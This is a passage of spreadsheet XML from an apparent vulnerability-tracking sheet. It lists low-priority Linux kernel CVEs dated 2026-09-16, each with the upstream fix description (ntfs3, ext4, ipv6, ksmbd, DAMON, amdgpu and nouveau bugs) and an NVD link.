        </is>
      </c>
      <c r="S1533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89784</t>
        </is>
      </c>
    </row>
    <row r="1534">
      <c r="A1534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89785</t>
        </is>
      </c>
      <c r="D1534" s="5" t="inlineStr"/>
      <c r="E1534" s="5" t="inlineStr"/>
      <c r="F1534" s="5" t="inlineStr"/>
      <c r="G1534" s="5" t="inlineStr"/>
      <c r="H1534" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1534" s="5" t="inlineStr"/>
      <c r="J1534" s="5" t="inlineStr"/>
      <c r="K1534" s="5" t="inlineStr"/>
      <c r="L1534" s="5" t="inlineStr"/>
      <c r="M1534" s="5" t="inlineStr"/>
      <c r="N1534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1534" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1534" s="5" t="inlineStr"/>
      <c r="Q1534" s="5" t="inlineStr"/>
      <c r="R1534" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: fix out-of-bounds read of INDEX_ROOT in reparse/objid init
ntfs_reparse_init() and ntfs_objid_init() parse the index root of the
$Extend/$Reparse and $Extend/$ObjId metafiles (the INDEX_ROOT attributes
named $R and $O). They read its type and rule fields through
resident_data(), which does not check that the resident attribute is
large enough to hold them.
mi_enum_attr() accepts a resident attribute with data_off == asize and
data_size == 0. For such an attribute placed last in its MFT record,
resident_data() returns a pointer to the end of the record_size buffer,
so reading root-&gt;type / root-&gt;rule reads past the allocation.
Use resident_data_ex(attr, sizeof(struct INDEX_ROOT)) and bail out when
it returns NULL, as ntfs_security_init() already does for $SDH / $SII.
The attribute is only parsed while mounting a crafted image, so this
needs CAP_SYS_ADMIN.
 BUG: KASAN: slab-out-of-bounds in ntfs_reparse_init (fs/ntfs3/fsntfs.c:2306)
 Read of size 4 at addr ffff88801219dc00 by task mount
  ntfs_reparse_init (fs/ntfs3/fsntfs.c:2306)
  ntfs_fill_super (fs/ntfs3/super.c:1604)
  get_tree_bdev_flags (fs/super.c:1703)
  vfs_get_tree (fs/super.c:1758)
  path_mount (fs/namespace.c:4131)
  __x64_sys_mount (fs/namespace.c:4360)</t>
        </is>
      </c>
      <c r="S1534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89785</t>
        </is>
      </c>
    </row>
    <row r="1535">
      <c r="A1535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89787</t>
        </is>
      </c>
      <c r="D1535" s="5" t="inlineStr"/>
      <c r="E1535" s="5" t="inlineStr"/>
      <c r="F1535" s="5" t="inlineStr"/>
      <c r="G1535" s="5" t="inlineStr"/>
      <c r="H1535" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1535" s="5" t="inlineStr"/>
      <c r="J1535" s="5" t="inlineStr"/>
      <c r="K1535" s="5" t="inlineStr"/>
      <c r="L1535" s="5" t="inlineStr"/>
      <c r="M1535" s="5" t="inlineStr"/>
      <c r="N1535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1535" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1535" s="5" t="inlineStr"/>
      <c r="Q1535" s="5" t="inlineStr"/>
      <c r="R1535" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: check dir entry fits before reading the hash trailer in ext4_search_dir()
For casefolded encrypted directories ext4 stores an 8-byte hash trailer
after the name (EXT4_DIRENT_HASHES()), at an offset derived from
de-&gt;name_len.  On the sb_no_casefold_compat_fallback() path ext4_match()
reads that trailer, but ext4_search_dir()'s by-hand pre-check only tests
de-&gt;name + de-&gt;name_len &lt;= dlimit, which proves the name fits, not the
rounded trailer.  A crafted entry whose name ends at the block boundary
passes the check while EXT4_DIRENT_HASHES(de) lands past the block end,
so ext4_match() reads out of bounds on an ordinary lookup.  KASAN reports
it as a use-after-free when the page after the directory block holds a
freed object:
  BUG: KASAN: use-after-free in ext4_match (fs/ext4/namei.c:1435)
  Read of size 4 at addr ffff888010458000 by task exploit
  Call Trace:
   ext4_match (fs/ext4/namei.c:1435)
   ext4_search_dir (fs/ext4/namei.c:1470)
   __ext4_find_entry (fs/ext4/namei.c:1268 fs/ext4/namei.c:1632)
   ext4_lookup (fs/ext4/namei.c:1703 fs/ext4/namei.c:1769)
   ...
   filename_lookup (fs/namei.c:2842)
   vfs_statx (fs/stat.c:353)
   __do_sys_newfstatat (fs/stat.c:538)
   do_syscall_64 (arch/x86/entry/syscall_64.c:94)
   entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
Require, for hash-in-dirent directories, that the whole entry including
the rounded trailer fits before calling ext4_match().  This is the same
bound ext4_check_dir_entry() already enforces via ext4_dir_rec_len(), so
no well-formed entry is rejected.  The other caller, ext4_find_dest_de(),
runs ext4_check_dir_entry() first and is unaffected.</t>
        </is>
      </c>
      <c r="S1535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89787</t>
        </is>
      </c>
    </row>
    <row r="1536">
      <c r="A1536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89790</t>
        </is>
      </c>
      <c r="D1536" s="5" t="inlineStr"/>
      <c r="E1536" s="5" t="inlineStr"/>
      <c r="F1536" s="5" t="inlineStr"/>
      <c r="G1536" s="5" t="inlineStr"/>
      <c r="H1536" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1536" s="5" t="inlineStr"/>
      <c r="J1536" s="5" t="inlineStr"/>
      <c r="K1536" s="5" t="inlineStr"/>
      <c r="L1536" s="5" t="inlineStr"/>
      <c r="M1536" s="5" t="inlineStr"/>
      <c r="N1536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1536" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1536" s="5" t="inlineStr"/>
      <c r="Q1536" s="5" t="inlineStr"/>
      <c r="R1536" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: avoid divide by zero in rt6_multipath_rebalance
rt6_multipath_rebalance() calculates the total eligible nexthop weight
in one pass and programs upper bounds in a second pass. Since
RTM_NEWROUTE is RTNL-free, a concurrent
ignore_routes_with_linkdown update can make the first pass return zero
while the second sees an eligible nexthop, causing
rt6_upper_bound_set() to divide by zero.
UBSAN: division-overflow in net/ipv6/route.c:4845:17
Oops: divide error: 0000 [#1] SMP KASAN NOPTI
  rt6_upper_bound_set() net/ipv6/route.c:4845
  rt6_multipath_rebalance()
  fib6_add_rt2node()
  ip6_route_multipath_add()
  inet6_rtm_newroute()
Skip upper-bound calculation when the first pass reports a zero total.
This respects the lock-free performance considerations here and solves
insecure scenarios.</t>
        </is>
      </c>
      <c r="S1536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89790</t>
        </is>
      </c>
    </row>
    <row r="1537">
      <c r="A1537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89794</t>
        </is>
      </c>
      <c r="D1537" s="5" t="inlineStr"/>
      <c r="E1537" s="5" t="inlineStr"/>
      <c r="F1537" s="5" t="inlineStr"/>
      <c r="G1537" s="5" t="inlineStr"/>
      <c r="H1537" s="5" t="inlineStr"/>
      <c r="I1537" s="5" t="inlineStr"/>
      <c r="J1537" s="5" t="inlineStr"/>
      <c r="K1537" s="5" t="inlineStr"/>
      <c r="L1537" s="5" t="inlineStr"/>
      <c r="M1537" s="5" t="inlineStr"/>
      <c r="N1537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1537" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1537" s="5" t="inlineStr"/>
      <c r="Q1537" s="5" t="inlineStr"/>
      <c r="R1537" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: zero pipe read compound padding
Compound response handling extends the last response iov to an eight-byte
boundary.
smb2_read_pipe() allocates only the payload size, so the alignment padding
can expose up to seven bytes of uninitialized kernel heap memory.
Allocate the aligned size and clear the unused tail before pinning the
response buffer.</t>
        </is>
      </c>
      <c r="S1537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89794</t>
        </is>
      </c>
    </row>
    <row r="1538">
      <c r="A1538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89796</t>
        </is>
      </c>
      <c r="D1538" s="5" t="inlineStr"/>
      <c r="E1538" s="5" t="inlineStr"/>
      <c r="F1538" s="5" t="inlineStr"/>
      <c r="G1538" s="5" t="inlineStr"/>
      <c r="H1538" s="5" t="inlineStr"/>
      <c r="I1538" s="5" t="inlineStr"/>
      <c r="J1538" s="5" t="inlineStr"/>
      <c r="K1538" s="5" t="inlineStr"/>
      <c r="L1538" s="5" t="inlineStr"/>
      <c r="M1538" s="5" t="inlineStr"/>
      <c r="N1538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1538" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1538" s="5" t="inlineStr"/>
      <c r="Q1538" s="5" t="inlineStr"/>
      <c r="R1538" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/damon/core: avoid infinite kdamond_merge_regions() internal loop
Patch series "mm/damon: unurgent fixes for infinite loop, NULL de-ref and
races", v1.1.
Sashiko found a few issues in DAMON that could cause infinite loop, NULL
dereference and monitoring results degradation.  The first two sounds
scary but the infinite loop happens only under unreasonable user setup. 
The NULL dereference is only in a unit test.  Monitoring results
degradation is trivial since it is only best-effort, and those happens
from only unlikely races.  Still those are bugs that better to fix if
possible.  Fix those.
This patch (of 6):
Due to online parameter update like events, the number of DAMON regions
could be higher than the user-set upper limit.  kdamond_merge_regions()
repeats merge regions until the number meets the limit, while doubling the
merge threshold up to the theoretical maximum threshold.  It is tried only
up to the theoretical maximum threshold because even the aggressive
merging can fail from reducing the number of regions under the
user-defined upper limit.  For example, there could be many user-defined
non-contiguous regions that cannot be merged.
The threshold based loop break condition is evaluated by comparing the
threshold for the next merging try against the theoretical maximum
threshold.  If max_thres is larger than UINT_MAX / 2, doubling the
threshold could make it overflow, and bypass the loop break condition.  In
the case, if the number of regions cannot be reduced under the upper limit
like explained above, the loop will run infinitely.
Prevent the case by doing the break condition check before doubling the
threshold.  Also, prevent the threshold exceeding the maximum threshold,
as it could overflow and apply the wrong merge threshold.
This issue is unlikely to occur in real world, since having the max_thres
higher than UINT_MAX / 2 require unrealistically large aggregation
intervals compared to the sampling interval.  Also, it requires an
unrealistically large number of uncontiguous regions setup.  Nonetheless,
the consequence is bad and the fix is simple.
The issue was discovered [1] by Sashiko.</t>
        </is>
      </c>
      <c r="S1538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89796</t>
        </is>
      </c>
    </row>
    <row r="1539">
      <c r="A1539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89797</t>
        </is>
      </c>
      <c r="D1539" s="5" t="inlineStr"/>
      <c r="E1539" s="5" t="inlineStr"/>
      <c r="F1539" s="5" t="inlineStr"/>
      <c r="G1539" s="5" t="inlineStr"/>
      <c r="H1539" s="5" t="inlineStr"/>
      <c r="I1539" s="5" t="inlineStr"/>
      <c r="J1539" s="5" t="inlineStr"/>
      <c r="K1539" s="5" t="inlineStr"/>
      <c r="L1539" s="5" t="inlineStr"/>
      <c r="M1539" s="5" t="inlineStr"/>
      <c r="N1539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1539" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1539" s="5" t="inlineStr"/>
      <c r="Q1539" s="5" t="inlineStr"/>
      <c r="R1539" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: ab8500_fg: fix use-after-free on remove
ab8500_fg_remove() destroys the driver workqueue while the threaded
interrupt handlers are still armed; they are devm-managed and freed
only after -&gt;remove() returns, so a handler that fires in that
window queues work on the freed workqueue.
Tear the workqueue down through devm instead, registering its cleanup
after the power supply and before the interrupt requests.  devm then
frees the interrupts first, so the handlers can no longer queue work,
before disabling the delayed and plain work items and destroying the
workqueue.  Disabling the items, rather than cancelling them, keeps
them disabled so no producer (including the power-supply
external_power_changed callback) can requeue them.
Found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S1539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89797</t>
        </is>
      </c>
    </row>
    <row r="1540">
      <c r="A1540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89798</t>
        </is>
      </c>
      <c r="D1540" s="5" t="inlineStr"/>
      <c r="E1540" s="5" t="inlineStr"/>
      <c r="F1540" s="5" t="inlineStr"/>
      <c r="G1540" s="5" t="inlineStr"/>
      <c r="H1540" s="5" t="inlineStr"/>
      <c r="I1540" s="5" t="inlineStr"/>
      <c r="J1540" s="5" t="inlineStr"/>
      <c r="K1540" s="5" t="inlineStr"/>
      <c r="L1540" s="5" t="inlineStr"/>
      <c r="M1540" s="5" t="inlineStr"/>
      <c r="N1540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1540" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1540" s="5" t="inlineStr"/>
      <c r="Q1540" s="5" t="inlineStr"/>
      <c r="R1540" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rpcrdma: arm rn_done before publishing the notification
rpcrdma_rn_register() inserts @rn into rd_xa with xa_alloc() before
storing the caller's callback in rn-&gt;rn_done. The xarray makes @rn
reachable to rpcrdma_remove_one(), which walks rd_xa and invokes
rn-&gt;rn_done(rn) for every registered notification. A device removal
that races a fresh registration can therefore observe @rn with
rn_done still NULL, because the notification objects are zero
allocated by their owners, and call through a NULL function pointer.
Store rn-&gt;rn_done before xa_alloc() publishes @rn. The xarray's
store-side and load-side ordering then guarantees that any CPU which
finds @rn in rd_xa also observes the armed callback.
rpcrdma_rn_unregister() treats a non-NULL rn_done as the sentinel
for a completed registration, so the early store must not survive a
failed registration. Clear rn_done again when xa_alloc() fails.
Were it left set, the failed-accept cleanup path would call
rpcrdma_rn_unregister() on an @rn that was never inserted, erasing
an unrelated rd_xa slot and underflowing rd_kref.</t>
        </is>
      </c>
      <c r="S1540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89798</t>
        </is>
      </c>
    </row>
    <row r="1541">
      <c r="A1541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89800</t>
        </is>
      </c>
      <c r="D1541" s="5" t="inlineStr"/>
      <c r="E1541" s="5" t="inlineStr"/>
      <c r="F1541" s="5" t="inlineStr"/>
      <c r="G1541" s="5" t="inlineStr"/>
      <c r="H1541" s="5" t="inlineStr"/>
      <c r="I1541" s="5" t="inlineStr"/>
      <c r="J1541" s="5" t="inlineStr"/>
      <c r="K1541" s="5" t="inlineStr"/>
      <c r="L1541" s="5" t="inlineStr"/>
      <c r="M1541" s="5" t="inlineStr"/>
      <c r="N1541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1541" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1541" s="5" t="inlineStr"/>
      <c r="Q1541" s="5" t="inlineStr"/>
      <c r="R1541" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau/uvmm: clear the dirty flag when unwinding an OP_UNMAP_SPARSE
A successful OP_UNMAP_SPARSE marks its region dirty with
nouveau_uvma_region_dirty() and defers the teardown to
nouveau_uvmm_bind_job_cleanup(); it does not remove the region from
uvmm-&gt;region_mt.
If a later op in the job fails, the unwind path never clears reg-&gt;dirty
(set in one place, cleared nowhere) and sets op-&gt;reg = NULL, so cleanup
skips the teardown. The region is left in the tree with dirty set and its
completion never signalled. Later binds over that range then fail
permanently -- -ENOENT or -EINVAL from the dirty checks, or an unkillable
wait_for_completion() in bind_validate_region() -- for the lifetime of
the uvmm.
Clear reg-&gt;dirty when the unwind reverts the sparse unmap, restoring the
region to the state it was found in.</t>
        </is>
      </c>
      <c r="S1541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89800</t>
        </is>
      </c>
    </row>
    <row r="1542">
      <c r="A1542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89802</t>
        </is>
      </c>
      <c r="D1542" s="5" t="inlineStr"/>
      <c r="E1542" s="5" t="inlineStr"/>
      <c r="F1542" s="5" t="inlineStr"/>
      <c r="G1542" s="5" t="inlineStr"/>
      <c r="H1542" s="5" t="inlineStr"/>
      <c r="I1542" s="5" t="inlineStr"/>
      <c r="J1542" s="5" t="inlineStr"/>
      <c r="K1542" s="5" t="inlineStr"/>
      <c r="L1542" s="5" t="inlineStr"/>
      <c r="M1542" s="5" t="inlineStr"/>
      <c r="N1542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1542" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1542" s="5" t="inlineStr"/>
      <c r="Q1542" s="5" t="inlineStr"/>
      <c r="R1542" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau/uvmm: fix NULL deref unwinding an OP_MAP_SPARSE op
Each bind_job_op is zeroed by kzalloc_obj() in bind_job_op_from_uop(),
and the OP_MAP_SPARSE case in nouveau_uvmm_bind_job_submit() only creates
a region, so op-&gt;ops stays NULL for a successfully processed sparse map.
If a later op in the same job fails, the reverse unwind loop revisits that
op and calls drm_gpuva_ops_free(&amp;uvmm-&gt;base, op-&gt;ops) unconditionally.
drm_gpuva_ops_free() dereferences its argument right away
(list_for_each_entry_safe on &amp;ops-&gt;list), so a NULL op-&gt;ops oopses. The
path is reachable by any render-node fd holder, since NOUVEAU_VM_BIND is
DRM_RENDER_ALLOW.
Guard the free with IS_ERR_OR_NULL(), as nouveau_uvmm_bind_job_cleanup()
already does for the identical free.</t>
        </is>
      </c>
      <c r="S1542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89802</t>
        </is>
      </c>
    </row>
    <row r="1543">
      <c r="A1543" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89807</t>
        </is>
      </c>
      <c r="D1543" s="5" t="inlineStr"/>
      <c r="E1543" s="5" t="inlineStr"/>
      <c r="F1543" s="5" t="inlineStr"/>
      <c r="G1543" s="5" t="inlineStr"/>
      <c r="H1543" s="5" t="inlineStr"/>
      <c r="I1543" s="5" t="inlineStr"/>
      <c r="J1543" s="5" t="inlineStr"/>
      <c r="K1543" s="5" t="inlineStr"/>
      <c r="L1543" s="5" t="inlineStr"/>
      <c r="M1543" s="5" t="inlineStr"/>
      <c r="N1543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1543" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1543" s="5" t="inlineStr"/>
      <c r="Q1543" s="5" t="inlineStr"/>
      <c r="R1543" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdkfd: guard against NULL restore_mqd in CRIU queue restore
Both create_queue_cpsch() and create_queue_nocpsch() unconditionally
call mqd_mgr-&gt;restore_mqd() when a CRIU restore is in progress
(qd != NULL), with no NULL guard. On any system where restore_mqd is
not implemented for the given queue type, a user holding
CAP_CHECKPOINT_RESTORE can trigger a kernel NULL pointer dereference
and panic the machine by issuing KFD_IOC_CRIU_OP_RESTORE with a
crafted queue restore object. Note that checkpoint_mqd is likewise
unimplemented on GFX12, so no legitimate CRIU image can reach this
path — only a hand-crafted restore payload.
Add a NULL guard for restore_mqd immediately after mqd_mgr is
resolved, unwinding via the existing error labels and returning
-EOPNOTSUPP if the callback is not implemented. This mirrors the
existing checkpoint_mqd guard in checkpoint_mqd().</t>
        </is>
      </c>
      <c r="S1543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89807</t>
        </is>
      </c>
    </row>
    <row r="1544">
      <c r="A1544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89809</t>
        </is>
      </c>
      <c r="D1544" s="5" t="inlineStr"/>
      <c r="E1544" s="5" t="inlineStr"/>
      <c r="F1544" s="5" t="inlineStr"/>
      <c r="G1544" s="5" t="inlineStr"/>
      <c r="H1544" s="5" t="inlineStr"/>
      <c r="I1544" s="5" t="inlineStr"/>
      <c r="J1544" s="5" t="inlineStr"/>
      <c r="K1544" s="5" t="inlineStr"/>
      <c r="L1544" s="5" t="inlineStr"/>
      <c r="M1544" s="5" t="inlineStr"/>
      <c r="N1544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1544" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1544" s="5" t="inlineStr"/>
      <c r="Q1544" s="5" t="inlineStr"/>
      <c r="R1544" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdkfd: fix scope of mqd_mgr dereference in pqm_debugfs_mqds
Reading /sys/kernel/debug/kfd/mqds while a process holds an active KFD
queue triggers a NULL pointer dereference because the for loop that
calls mqd_mgr-&gt;debugfs_show_mqd() is incorrectly placed outside the
if (pqn-&gt;q) block that initializes mqd_mgr.
The queue list can contain entries where pqn-&gt;q is NULL (kernel queues
where only pqn-&gt;kq is valid). In the original code:
  if (pqn-&gt;q) {
      ...
      mqd_mgr = q-&gt;device-&gt;dqm-&gt;mqd_mgrs[mqd_type];
      size = mqd_mgr-&gt;mqd_stride(...);
  }
  for (xcc = 0; xcc &lt; num_xccs; xcc++) {  // WRONG: outside if block
      mqd = q-&gt;mqd + size * xcc;
      r = mqd_mgr-&gt;debugfs_show_mqd(m, mqd);
  }
When iterating over a queue node where pqn-&gt;q is NULL:
1. The if (pqn-&gt;q) block is skipped
2. mqd_mgr remains uninitialized (NULL from declaration)
3. The for loop executes anyway
4. mqd_mgr-&gt;debugfs_show_mqd(m, mqd) dereferences NULL
The crash manifests as:
  BUG: kernel NULL pointer dereference, address: 0000000000000000
  #PF: supervisor instruction fetch in kernel mode
  RIP: 0010:0x0
  Call Trace:
   pqm_debugfs_mqds+0x10c/0x1d0 [amdgpu]
   kfd_debugfs_mqds_by_process+0x9b/0x110 [amdgpu]
   seq_read_iter+0x132/0x4b0
   ...
Fix by moving the for loop inside the if (pqn-&gt;q) block, so mqd_mgr
and related variables are only used when properly initialized.
(cherry picked from commit 8bfe29d5c798940f797aa24135d2734c3ffce9de)</t>
        </is>
      </c>
      <c r="S1544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89809</t>
        </is>
      </c>
    </row>
    <row r="1545">
      <c r="A1545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89812</t>
        </is>
      </c>
      <c r="D1545" s="5" t="inlineStr"/>
      <c r="E1545" s="5" t="inlineStr"/>
      <c r="F1545" s="5" t="inlineStr"/>
      <c r="G1545" s="5" t="inlineStr"/>
      <c r="H1545" s="5" t="inlineStr"/>
      <c r="I1545" s="5" t="inlineStr"/>
      <c r="J1545" s="5" t="inlineStr"/>
      <c r="K1545" s="5" t="inlineStr"/>
      <c r="L1545" s="5" t="inlineStr"/>
      <c r="M1545" s="5" t="inlineStr"/>
      <c r="N1545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1545" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1545" s="5" t="inlineStr"/>
      <c r="Q1545" s="5" t="inlineStr"/>
      <c r="R1545" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: force complete the MES ring fences on reset
The MES scheduler ring has no drm scheduler (no_scheduler = true), so it is
skipped by the force-completion loop in amdgpu_device_pre_asic_reset(). It uses
a polling fence whose hw value lives in wb (GTT) memory and survives a MODE1
reset, while fence_drv.sync_seq keeps advancing for every packet.
When the reset is triggered because MES itself stopped responding, the
timed-out packets advance sync_seq past the last hw fence value MES wrote.
After resume the first MES submission polls forever on a seq that is never
written back, failing the resume and wedging the box on a second reset:
  amdgpu: MES ring buffer is full.
  amdgpu: *ERROR* ring gfx_0.0.0 test failed (-110)
  amdgpu: resume of IP block &lt;gfx_v11_0&gt; failed -110
  amdgpu: GPU reset end with ret = -110
Force complete the MES scheduler ring fences together with the scheduler rings
so their hw fence is realigned to sync_seq.
v2: cover all XCCs (one scheduler ring each), not just mes.ring[0].</t>
        </is>
      </c>
      <c r="S1545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89812</t>
        </is>
      </c>
    </row>
    <row r="1546">
      <c r="A1546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89813</t>
        </is>
      </c>
      <c r="D1546" s="5" t="inlineStr"/>
      <c r="E1546" s="5" t="inlineStr"/>
      <c r="F1546" s="5" t="inlineStr"/>
      <c r="G1546" s="5" t="inlineStr"/>
      <c r="H1546" s="5" t="inlineStr"/>
      <c r="I1546" s="5" t="inlineStr"/>
      <c r="J1546" s="5" t="inlineStr"/>
      <c r="K1546" s="5" t="inlineStr"/>
      <c r="L1546" s="5" t="inlineStr"/>
      <c r="M1546" s="5" t="inlineStr"/>
      <c r="N1546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1546" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1546" s="5" t="inlineStr"/>
      <c r="Q1546" s="5" t="inlineStr"/>
      <c r="R1546" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: force complete the KIQ ring fences on reset
Like the MES scheduler ring, the KIQ ring sets no_scheduler = true and uses a
polling fence, so it is skipped by the force-completion loop in
amdgpu_device_pre_asic_reset(). Its hw fence value lives in wb (GTT) memory and
survives a MODE1 reset while fence_drv.sync_seq keeps advancing, so after a
reset the first KIQ submission can poll forever on a seq that is never written
back.
Force complete the KIQ ring fences too so their hw fence is realigned to
sync_seq.</t>
        </is>
      </c>
      <c r="S1546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89813</t>
        </is>
      </c>
